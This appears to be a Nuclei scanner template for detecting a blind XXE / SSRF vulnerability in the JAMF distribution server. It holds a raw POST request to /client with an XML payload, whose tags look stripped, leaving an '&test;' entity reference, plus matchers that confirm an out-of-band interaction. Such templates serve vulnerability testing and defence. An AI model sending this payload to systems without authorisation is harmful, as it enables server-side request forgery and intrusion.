id: jamf-blind-xxe info: name: JAMF Blind XXE / SSRF author: pdteam severity: medium reference: https://www.synack.com/blog/a-deep-dive-into-xxe-injection/ tags: xxe,ssrf,jamf requests: - raw: - | POST /client HTTP/1.1 Host: {{Hostname}} Content-Type: application/xml &test; com.jamfsoftware.jamfdistributionserver {{unix_time()}} 00000000-0000-0000-0000-000000000000 com.jamfsoftware.jamf.distributionserverinventoryrequest 1999 {{unix_time()}} 34 matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the DNS Interaction words: - "http" - type: word words: - "com.jamfsoftware.jss"